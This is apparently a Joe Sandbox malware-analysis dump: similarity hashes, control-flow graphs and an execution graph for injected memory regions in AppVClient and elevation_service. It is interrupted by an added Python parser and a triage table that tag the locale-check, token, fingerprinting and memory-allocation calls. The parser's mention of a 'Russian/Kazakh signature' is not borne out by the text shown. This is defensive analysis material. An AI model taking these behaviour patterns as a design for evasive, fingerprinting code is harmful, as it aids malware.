                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: 12e63d3664ec34d2d4f41083347c84974f02c51d16f4aba6dbc09d18fced6930
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 8401F97093DF80CFD727971954453796691F754320F280596905ECB192C8344F02B781

                                        Control-flow Graph

                                        control_flow_graph 500 c35be2-c35be5 501 c35be7-c35bef 500->501 502 c35bfc-c35c05 CloseHandle 500->502 503 c35ca3 501->503 509 c35d37-c35d41 502->509 506 c35ca5 503->506 507 c35ca8-c35cb3 call c35e10 503->507 506->507 510 c35ca7 506->510 514 c35d26 507->514 515 c35cb5 507->515 512 c35d43 509->512 513 c35d4b-c35d52 509->513 510->509 517 c35d54 512->517 516 c35d45-c35d47 513->516 513->517 521 c35d27-c35d2a call c35910 514->521 515->514 520 c35cb7 515->520 518 c35d49 516->518 519 c35d5f 516->519 518->513 518->519 525 c35d65 519->525 522 c35d5b-c35d5d 520->522 526 c35d2e 521->526 522->519 525->525 526->522
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: 3e03092d81f6ac67b15309d279fd7e6fb23dbb1020c46dbd1e4560ccf0aed7fb
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: D2E02B31538F0ACFEB54A61ADE092B522C0E73C3A8F2409218C03CB120E514CF06AB02

                                        Control-flow Graph

control_flow_graph 527 c38090-c38096 528 c38184 527->528 529 c38186 CloseHandle 528->529 530 c3818c-c38192 528->530 529->530 531 c38115-c38118 530->531 532 c38194 530->532 534 c380a7 531->534 535 c38119-c3811a 531->535 532->531 533 c3819a 532->533 536 c3813c 533->536 535->534 537 c3811c 535->537 536->528 538 c3820f 537->538 539 c38215-c3821e 538->539 540 c3808e-c38096 538->540 539->540 542 c38224 539->542 540->528 540->534 543 c381d7-c381e6 call c6715c 542->543 544 c38226 542->544 553 c380ca-c3810f GetTokenInformation 543->553 554 c38089 543->554 544->543 545 c38228-c382ee call c35d90 544->545 557 c382f0 545->557 558 c3830c-c3831e 545->558 562 c38111 553->562 563 c3812d 553->563 554->553 556 c3808b 554->556 566 c3808c 556->566 557->558 564 c382f2 557->564 560 c382a1-c382ba call c35d90 call c3ec00 558->560 561 c38320 558->561 560->561 567 c38322 561->567 568 c382f7-c382fc call c35d90 561->568 562->563 569 c38113 562->569 570 c38133 563->570 571 c380a8 563->571 564->568 566->540 567->568 574 c38324-c38326 567->574 589 c38253-c38265 call c51280 568->589 590 c38302 568->590 569->531 570->536 572 c381ed-c381f0 570->572 575 c380aa-c380ad 571->575 578 c381f6 572->578 579 c380da-c380f1 572->579 580 c38328 574->580 581 c38163-c38170 call c67164 575->581 582 c380b3-c38203 575->582 578->579 586 c381fc 578->586 579->575 592 c38335 580->592 593 c382df-c3832b 580->593 581->529 600 c38172 581->600 582->581 598 c38209 582->598 596 c381fe-c38201 GetTokenInformation 586->596 589->580 606 c3826b 589->606 590->589 597 c38308-c3830a 590->597 603 c3826e-c38285 592->603 593->592 605 c3832d-c38331 593->605 596->538 610 c381b7 596->610 597->558 600->530 608 c38287 603->608 609 c3829b-c3829d 603->609 605->592 606->603 611 c38239 606->611 612 c3824c 608->612 609->560 610->538 613 c381b9-c381ca 610->613 611->580 614 c3823f-c38243 611->614 612->609 615 c3824e-c38252 612->615 618 c380f3 613->618 619 c381d0 613->619 614->568 614->612 615->603 618->566 620 c380f5 618->620 619->596 625 c380c3 619->625 620->566 624 c38077 620->624 624->543 625->596 626 c380c9 625->626 626->553
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 6b9d08aa84109981c3e6b90c98c6ae274f52a1c635a133ab8b828730c699a4cf
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: EAC04C6163DF4696567906491C1B0FC3B509602795F5C0446BC2681324DD558F4B51DB

                                        Control-flow Graph

control_flow_graph 627 c3817f 628 c38184 627->628 629 c38186 CloseHandle 628->629 630 c3818c-c38192 628->630 629->630 631 c38115-c38118 630->631 632 c38194 630->632 634 c380a7 631->634 635 c38119-c3811a 631->635 632->631 633 c3819a 632->633 636 c3813c 633->636 635->634 637 c3811c 635->637 636->628 638 c3820f 637->638 639 c38215-c3821e 638->639 640 c3808e-c38096 638->640 639->640 642 c38224 639->642 640->628 640->634 643 c381d7-c381e6 call c6715c 642->643 644 c38226 642->644 653 c380ca-c3810f GetTokenInformation 643->653 654 c38089 643->654 644->643 645 c38228-c382ee call c35d90 644->645 657 c382f0 645->657 658 c3830c-c3831e 645->658 662 c38111 653->662 663 c3812d 653->663 654->653 656 c3808b 654->656 666 c3808c 656->666 657->658 664 c382f2 657->664 660 c382a1-c382ba call c35d90 call c3ec00 658->660 661 c38320 658->661 660->661 667 c38322 661->667 668 c382f7-c382fc call c35d90 661->668 662->663 669 c38113 662->669 670 c38133 663->670 671 c380a8 663->671 664->668 666->640 667->668 674 c38324-c38326 667->674 689 c38253-c38265 call c51280 668->689 690 c38302 668->690 669->631 670->636 672 c381ed-c381f0 670->672 675 c380aa-c380ad 671->675 678 c381f6 672->678 679 c380da-c380f1 672->679 680 c38328 674->680 681 c38163-c38170 call c67164 675->681 682 c380b3-c38203 675->682 678->679 686 c381fc 678->686 679->675 692 c38335 680->692 693 c382df-c3832b 680->693 681->629 700 c38172 681->700 682->681 698 c38209 682->698 696 c381fe-c38201 GetTokenInformation 686->696 689->680 706 c3826b 689->706 690->689 697 c38308-c3830a 690->697 703 c3826e-c38285 692->703 693->692 705 c3832d-c38331 693->705 696->638 710 c381b7 696->710 697->658 700->630 708 c38287 703->708 709 c3829b-c3829d 703->709 705->692 706->703 711 c38239 706->711 712 c3824c 708->712 709->660 710->638 713 c381b9-c381ca 710->713 711->680 714 c3823f-c38243 711->714 712->709 715 c3824e-c38252 712->715 718 c380f3 713->718 719 c381d0 713->719 714->668 714->712 715->703 718->666 720 c380f5 718->720 719->696 725 c380c3 719->725 720->666 724 c38077 720->724 724->643 725->696 726 c380c9 725->726 726->653
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: c1f1eec48696f2b4868630efcacf8d4ca668e1beedda0ecb8e2f06eca5c9b43c
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 97C092A0678B0987513826892C0A0BD3AA04613BA0F0D4512FD268A368DD984F4B42E2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: _clrfp
                                        • String ID:
                                        • API String ID: 3618594692-0
                                        • Opcode ID: b2614b7e1b0189ae345bd4c1d95b1b808051b71dd771fb59e21b33d23e549fbc
                                        • Instruction ID: b7b08fd7b72afc30a09e93b0796eb3bdf37f29d66915edc4b6421a6a6c5c6244
                                        • Opcode Fuzzy Hash: b2614b7e1b0189ae345bd4c1d95b1b808051b71dd771fb59e21b33d23e549fbc
                                        • Instruction Fuzzy Hash: B4B16A31610A5D8FDBA9CF1CC8CAB6677E0FF59304F198599E86ACB262C335D952CB01
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33f1da026cedb8bb4c154c58f95936b4a0e13185094ee08358de1f6eed02a0cf
                                        • Instruction ID: aced9e1f394c2d1740a3408650b3d1d5d186c70fa47c36cfecad040983deca44
                                        • Opcode Fuzzy Hash: 33f1da026cedb8bb4c154c58f95936b4a0e13185094ee08358de1f6eed02a0cf
                                        • Instruction Fuzzy Hash: 03F1A732668F1C079728EE9DAC8E2B573C2D3E8722F4A437F9805D3265DD75AC8185C2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 724192d415810ac4f34237431d09bd2ecc20d27c57fa4998346b62a5e3d6f42c
                                        • Instruction ID: 0f55d5a71881dfc16bbb5d5e56a918e39c0ed1c96015c9df648268c5cea446fe
                                        • Opcode Fuzzy Hash: 724192d415810ac4f34237431d09bd2ecc20d27c57fa4998346b62a5e3d6f42c
                                        • Instruction Fuzzy Hash: 5DC14A3242DB684ED32B9F7D98812E6F3E4FFD9319F41872AD9C5A3060DB3855478286
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e6b58e5a89bf5cdf24951cf629520558a61642b70cf246aec3f524e75493717
                                        • Instruction ID: 81878882f838a7c71bfcd71a9427000161ba3efb37b033e1f2411dee7fd754be
                                        • Opcode Fuzzy Hash: 4e6b58e5a89bf5cdf24951cf629520558a61642b70cf246aec3f524e75493717
                                        • Instruction Fuzzy Hash: 6061E531A293894B930DC91D9C864517B92EAA651937CC3ECCDD28F387E862F517C3D2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1f5d48277bc0f55615c85d5447f4aabc13901e765d7b4c94bbb2eede31096fc
                                        • Instruction ID: c00cc17ca08ed3c2e61101c402762fd99a63628e00dbfe91416c52aa389cc81a
                                        • Opcode Fuzzy Hash: a1f5d48277bc0f55615c85d5447f4aabc13901e765d7b4c94bbb2eede31096fc
                                        • Instruction Fuzzy Hash: B65171D0A3C7848BDB794B2E085427EBAB1EB95328F1D63DBE06AC2291D9244F41B355
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1cb0376d5f4543bb8137eeff6a4ca7b4a3039c8d8bd8826e253d9a000427cd9
                                        • Instruction ID: dd5ab14a278209c2a8eb9a9065036ab52eaa82f327a7141319c9eec701cba398
                                        • Opcode Fuzzy Hash: f1cb0376d5f4543bb8137eeff6a4ca7b4a3039c8d8bd8826e253d9a000427cd9
                                        • Instruction Fuzzy Hash: 53510DB28183058F8308CF19C882126FBE5FB8A714B15855EE9D697212D731F9538FC2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0710a6d56e74f75e4f2d76c0792897e09a389baafeaf9ef38ca3dee3c678baf7
                                        • Instruction ID: 95f53bcb3013ffc607570205fa4a55d7e593650cec09bf4caffca84637faaae4
                                        • Opcode Fuzzy Hash: 0710a6d56e74f75e4f2d76c0792897e09a389baafeaf9ef38ca3dee3c678baf7
                                        • Instruction Fuzzy Hash: C84182B69683048F830CDF14C883422B7E4FB8A719B25C56DD9D64B202DB31F953DAC2

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:98%
                                        Signature Coverage:0%
                                        Total number of Nodes:98
                                        Total number of Limit Nodes:10
execution_graph 5722 9981b1 5723 998075 5722->5723 5724 998186 CloseHandle 5723->5724 5725 9981ad GetTokenInformation 5723->5725 5726 9980ca GetTokenInformation 5723->5726 5727 9980a7 5723->5727 5724->5723 5725->5723 5726->5723 5782 998090 5785 998075 5782->5785 5783 998186 CloseHandle 5783->5785 5784 9980ca GetTokenInformation 5784->5785 5785->5783 5785->5784 5786 9980a7 5785->5786 5787 9981ad GetTokenInformation 5785->5787 5787->5785 5808 9957f0 5811 9955ac 5808->5811 5809 9955e9 5811->5808 5811->5809 5812 9b3870 5811->5812 5813 9b3876 5812->5813 5815 9b3893 5813->5815 5816 9b3720 5813->5816 5815->5811 5818 9a0c42 5816->5818 5817 99e050 VirtualAlloc 5817->5818 5818->5816 5818->5817 5819 9b37dd 5818->5819 5819->5815 5793 9952f4 5796 9952cb 5793->5796 5794 9953c4 GetSystemDefaultLangID 5795 9952b0 5794->5795 5796->5794 5796->5795 5788 9952b7 5789 9952b0 5788->5789 5791 9952c4 5788->5791 5790 9953c4 GetSystemDefaultLangID 5792 995475 5790->5792 5791->5789 5791->5790 5828 995b09 5829 995b16 5828->5829 5830 995cdf CreateThread 5829->5830 5831 995c01 5829->5831 5830->5829 5830->5831 5832 9954a0 5830->5832 5831->5831 5820 9955ef 5821 9955ac 5820->5821 5822 9b3870 VirtualAlloc 5821->5822 5823 9955e9 5821->5823 5822->5821 5728 995b00 5729 995bba 5728->5729 5736 9a52c0 5729->5736 5731 995bc7 5735 995bde 5731->5735 5741 9b0080 5731->5741 5737 9a52c6 5736->5737 5740 9a52ce 5736->5740 5737->5740 5755 99e050 5737->5755 5740->5731 5747 9b0089 5741->5747 5742 9b03e0 GetComputerNameW 5742->5747 5743 9b0181 VirtualFree 5743->5747 5744 99e050 VirtualAlloc 5744->5747 5745 9b03bf GetUserNameW 5745->5747 5746 9b04d6 GetComputerNameW 5746->5747 5747->5742 5747->5743 5747->5744 5747->5745 5747->5746 5748 995c7b 5747->5748 5749 998070 5748->5749 5751 998075 5749->5751 5750 998186 CloseHandle 5750->5751 5751->5750 5752 9981ad GetTokenInformation 5751->5752 5753 9980ca GetTokenInformation 5751->5753 5754 9980a7 5751->5754 5752->5751 5753->5751 5754->5735 5756 99e0c3 5755->5756 5757 99e0d8 VirtualAlloc 5756->5757 5757->5756 5797 995860 5798 9a52c0 VirtualAlloc 5797->5798 5799 995869 5798->5799 5800 9b0080 5 API calls 5799->5800 5801 99587d 5800->5801 5802 998070 3 API calls 5801->5802 5803 995870 5802->5803 5758 995b42 5759 995b07 5758->5759 5759->5758 5761 995b68 5759->5761 5763 995bb4 5759->5763 5764 9952a0 5759->5764 5762 995cdf CreateThread 5762->5761 5762->5763 5768 9954a0 5762->5768 5763->5761 5763->5762 5767 9952ab 5764->5767 5765 9953c4 GetSystemDefaultLangID 5766 9952b0 5765->5766 5766->5759 5767->5765 5767->5766 5769 9954b5 5768->5769 5824 9955e4 5826 9955ac 5824->5826 5825 9b3870 VirtualAlloc 5825->5826 5826->5824 5826->5825 5827 9955e9 5826->5827 5775 995b87 CreateThread 5777 995b1c 5775->5777 5779 995810 5775->5779 5776 995cdf CreateThread 5776->5777 5778 995c01 5776->5778 5781 9954a0 5776->5781 5777->5776 5777->5778 5780 995822 5779->5780 5843 995347 5846 9952cb 5843->5846 5844 9953c4 GetSystemDefaultLangID 5845 995475 5844->5845 5846->5844 5847 9952b0 5846->5847
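The execution graph above is emitted as a flat token stream: node definitions (`<id> <addr>[-<addr>]`, optionally followed by an API name, `call <addr>`, or a collapsed `N API calls` summary) interleaved with `<id>-><id>` edges. When triaging a report like this one, the question an analyst actually wants answered is "which API is reached from where", for instance that GetSystemDefaultLangID sits in the 9952a0 routine that the report's Russian/Kazakh signature refers to, and that both GetTokenInformation sites hang off 998075. The parser below is an added example for this page, not Joe Sandbox code; the grammar it assumes is inferred from the dumps on this page and is an assumption, as is the BEHAVIOUR tag table, which is an editor's triage mapping rather than sandbox output. The sample input is an excerpt of the execution_graph dump above (the 0x990000 region of the elevation_service process).

```python
"""Parse the edge-list text of a Joe Sandbox execution / control-flow graph dump.

Added example for this report page, not Joe Sandbox's own code. The grammar is
inferred from the dumps on this page (an assumption, not a documented format):
    <graph name> <node id> <addr>[-<addr>] [label ...] ... <id>-><id> ...
where labels are API names, "call <addr>", "N API calls" or "* N".
Node ids are decimal; addresses are lowercase hex of at least four digits.
"""
import re
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{4,}(?:-[0-9a-f]{4,})?$")
NOISE = {"call", "*", "API", "calls"}  # label tokens that are not API names

# Coarse behaviour tags for the APIs that occur in this report: the editor's
# triage mapping (an assumption), not something the sandbox emits.
BEHAVIOUR = {
    "GetSystemDefaultLangID": "locale check (report flags Russian/Kazakh handling)",
    "GetTokenInformation": "token / privilege inspection",
    "CreateThread": "thread creation",
    "VirtualAlloc": "memory allocation (unpacking or injection staging)",
    "VirtualFree": "memory release",
    "GetComputerNameW": "host fingerprinting",
    "GetUserNameW": "user fingerprinting",
    "CloseHandle": "handle cleanup",
}


@dataclass
class Node:
    nid: int
    addr: str
    labels: list = field(default_factory=list)

    def apis(self):
        """API names on this node; call targets, counters and keywords dropped."""
        return [t for t in self.labels
                if t not in NOISE and not NODE_ID_RE.match(t) and not ADDR_RE.match(t)]


def parse_graph(text):
    """Return (name, {node id: Node}, [(src, dst), ...]) for one graph dump."""
    tokens = text.split()
    name, tokens = tokens[0], tokens[1:]
    nodes, edges, cur = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif tok == "*" and cur is not None and i + 1 < len(tokens):
            cur.labels += [tok, tokens[i + 1]]  # "* N": repeated call, keep N as a label
            i += 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            cur = Node(int(tok), tokens[i + 1])  # "<id> <addr>" opens a new node
            nodes[cur.nid] = cur
            i += 1
        elif cur is not None:
            cur.labels.append(tok)  # API name, "call", call target or counter
        i += 1
    return name, nodes, edges


def api_sites(nodes):
    """Map each API name to the sorted addresses of the nodes that call it."""
    sites = {}
    for n in nodes.values():
        for api in n.apis():
            sites.setdefault(api, set()).add(n.addr)
    return {api: sorted(addrs) for api, addrs in sites.items()}


def triage(nodes):
    """Behaviour tags present in the graph, per BEHAVIOUR."""
    return sorted({BEHAVIOUR[a] for a in api_sites(nodes) if a in BEHAVIOUR})


def callers_of(nodes, edges, api):
    """Ids of nodes that have an edge into a node calling `api`."""
    targets = {n.nid for n in nodes.values() if api in n.apis()}
    return sorted({src for src, dst in edges if dst in targets})


# Excerpt of the execution_graph dump on this page (0x990000 region, elevation_service).
SAMPLE = (
    "execution_graph 5722 9981b1 5723 998075 5722->5723 5724 998186 CloseHandle "
    "5723->5724 5725 9981ad GetTokenInformation 5723->5725 5726 9980ca "
    "GetTokenInformation 5723->5726 5727 9980a7 5723->5727 5724->5723 5725->5723 "
    "5726->5723 5793 9952f4 5796 9952cb 5793->5796 5794 9953c4 GetSystemDefaultLangID "
    "5795 9952b0 5794->5795 5796->5794 5796->5795 5797 995860 5798 9a52c0 VirtualAlloc "
    "5797->5798 5799 995869 5798->5799 5800 9b0080 5 API calls 5799->5800"
)

if __name__ == "__main__":
    name, nodes, edges = parse_graph(SAMPLE)
    print(name, len(nodes), "nodes", len(edges), "edges")
    for api, addrs in sorted(api_sites(nodes).items()):
        print(f"  {api:24s} at {', '.join(addrs)}  callers {callers_of(nodes, edges, api)}")
    for tag in triage(nodes):
        print("  behaviour:", tag)
```

Feed it the control_flow_graph dumps on this page in the same way; they use the same token grammar, so `api_sites` on the 9b0080 graph yields the GetComputerNameW and GetUserNameW sites that the execution graph collapses into "5 API calls". The one known ambiguity is a bare counter (the N in "* N") immediately followed by a four-digit node id, which is why the parser consumes "* N" as a unit.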

                                        Control-flow Graph

                                        control_flow_graph 290 9952a0-9953fe 295 9d0d4c-9d0d4e 290->295 296 995400-995424 290->296 298 99539b 296->298 299 99542a 296->299 300 99539d-9953a1 298->300 301 995413-995419 298->301 299->298 302 995430-99543e 299->302 303 9952b0-9952b5 300->303 304 9953a7 300->304 305 995441-99544a 302->305 304->303 306 9953ad 304->306 310 995450 305->310 311 9953c4-9953ca GetSystemDefaultLangID 305->311 308 9953af 306->308 309 9953f3-9953f9 306->309 312 9953e0-9953f1 308->312 320 99532a 309->320 321 995355 309->321 318 995411 310->318 319 9953c1 310->319 314 995475-99547b 311->314 312->301 312->309 314->295 318->301 318->311 319->318 322 9953c3 319->322 320->321 324 99532c-99533f 320->324 325 9952e8-995363 321->325 326 9952d1-9952e7 321->326 327 99536b-99536f 324->327 332 9953d1-9953d5 325->332 333 995365 325->333 326->325 327->305 328 995375-995390 327->328 328->322 334 995392-99539a 328->334 332->300 335 9953d7 332->335 333->332 336 995367-995369 333->336 334->300 335->312 337 995342-995345 335->337 336->327 337->296 338 99534b 337->338 338->296 339 995351-995353 338->339 339->321
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 009953C4
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 7e1f51885664d4502edf64c1499c77b036275aacca76b39c856f677499d9dcd5
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: A241E55140DE95CFDF27432C48662777BA89B223E2F9F08D7D496CA0F2E19C4C819726

                                        Control-flow Graph

                                        control_flow_graph 0 9b0080-9b0286 2 9b0099-9b0575 0->2 3 9b028c 0->3 7 9b057b 2->7 8 9b0155 2->8 5 9b0445 3->5 5->2 6 9b044b-9b0457 5->6 9 9b0458-9b0472 GetComputerNameW 6->9 7->8 10 9b0581-9b0587 7->10 11 9b02ef-9b0495 call 99e050 * 2 8->11 15 9b03ee-9b03f4 9->15 16 9b024c-9b0253 9->16 13 9b058b 10->13 11->9 50 9b043e 11->50 18 9b058c-9b0591 13->18 19 9b0181 VirtualFree 13->19 37 9b00da-9b023f 15->37 38 9b03fa 15->38 23 9b01e6 16->23 24 9b0255 16->24 21 9b04ab-9b04af 18->21 22 9b0597 18->22 20 9b01a8-9b02ac call 9c7164 19->20 28 9b02b1-9b02be 20->28 48 9b04c7 21->48 22->21 30 9b059d 22->30 27 9b01ec-9b0313 call 9c715c 23->27 23->28 31 9b02d3 24->31 53 9b0318-9b031e 27->53 33 9b03bf-9b03d9 GetUserNameW 28->33 34 9b02c4 28->34 30->21 31->23 36 9b02d9 31->36 43 9b0331 33->43 34->33 44 9b02ca 34->44 36->11 37->16 51 9b0241-9b024a 37->51 38->37 45 9b0400 38->45 54 9b0171 43->54 55 9b0337 43->55 44->31 52 9bb1ee-9bb49f 45->52 59 9b04cc-9b04e6 call 9c9970 GetComputerNameW 48->59 50->5 51->16 51->28 57 9b0568-9b056b 53->57 58 9b0324 53->58 60 9b013f-9b0146 54->60 61 9b0173 54->61 55->54 56 9b033d 55->56 63 9b05d0-9b05d9 56->63 57->59 58->57 65 9b032a 58->65 70 9b04ec-9b0514 59->70 71 9b0131 59->71 60->13 62 9b0230 61->62 62->48 67 9b0236-9b05c2 62->67 63->52 65->43 67->48 74 9b05c8-9b05c9 67->74 70->57 72 9b0089-9b008c 71->72 73 9b0137 71->73 72->20 76 9b0092 72->76 73->72 77 9b013d 73->77 74->63 76->20 78 9b0098 76->78 77->19 77->60 78->2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: 318193acf0547fbb5b573026f16a91d4196d427215b1f93992e386db591f7248
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: 1AD1E43151CB0D8BC728EF58D94A7EBB7D5FBE0320F184A1ED846C7164DA789A458AC2

                                        Control-flow Graph

control_flow_graph 79 998070-99817e 81 99813d-9981a5 79->81 82 998180 79->82 97 9981bd-9981ca 81->97 98 9981a7 81->98 83 99815f 82->83 84 998184 82->84 83->81 88 998161 83->88 85 99818c-998192 84->85 86 998186 CloseHandle 84->86 89 998115-998118 85->89 90 998194 85->90 86->85 92 998163-998170 call 9c7164 88->92 94 998119-99811a 89->94 95 9980a7 89->95 90->89 96 99819a 90->96 92->86 102 998172 92->102 94->95 100 99811c 94->100 101 99813c 96->101 107 9981d0 97->107 108 9980f3 97->108 103 99820f 100->103 101->84 102->85 105 99808e-998096 103->105 106 998215-99821e 103->106 105->84 105->95 106->105 118 998224 106->118 115 9981fe-998201 GetTokenInformation 107->115 116 9980c3 107->116 110 99808c 108->110 111 9980f5 108->111 110->105 111->110 117 998077 111->117 115->103 130 9981b7 115->130 116->115 120 9980c9 116->120 121 9981d7-9981de call 9c715c 117->121 118->121 122 998226 118->122 126 9980ca-9980d8 GetTokenInformation 120->126 128 9981e3-9981e6 121->128 122->121 123 998228-9982ee call 995d90 122->123 145 99830c-99831e 123->145 146 9982f0 123->146 129 99810f 126->129 128->126 144 998089 128->144 131 99812d 129->131 132 998111 129->132 130->103 135 9981b9-9981bb 130->135 139 9980a8 131->139 140 998133 131->140 132->131 137 998113 132->137 135->97 137->89 142 9980aa-9980ad 139->142 140->101 143 9981ed-9981f0 140->143 142->92 147 9980b3-998203 142->147 148 9980da-9980f1 143->148 149 9981f6 143->149 144->126 150 99808b 144->150 154 9982a1-9982ba call 995d90 call 99ec00 145->154 155 998320 145->155 146->145 151 9982f2 146->151 147->92 158 998209 147->158 148->142 149->148 153 9981fc 149->153 150->110 157 9982f7-9982fc call 995d90 151->157 153->115 154->155 155->157 159 998322 155->159 169 998253-998265 call 9b1280 157->169 170 998302 157->170 159->157 163 998324-998326 159->163 166 998328 163->166 173 9982df-99832b 166->173 174 998335 166->174 169->166 179 99826b 169->179 170->169 175 998308-99830a 170->175 173->174 180 99832d-998331 173->180 178 99826e-998285 174->178 175->145 181 99829b-99829d 178->181 182 998287 178->182 179->178 184 998239 179->184 180->174 181->154 183 99824c 182->183 183->181 186 99824e-998252 183->186 184->166 185 99823f-998243 184->185 185->157 185->183 186->178
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
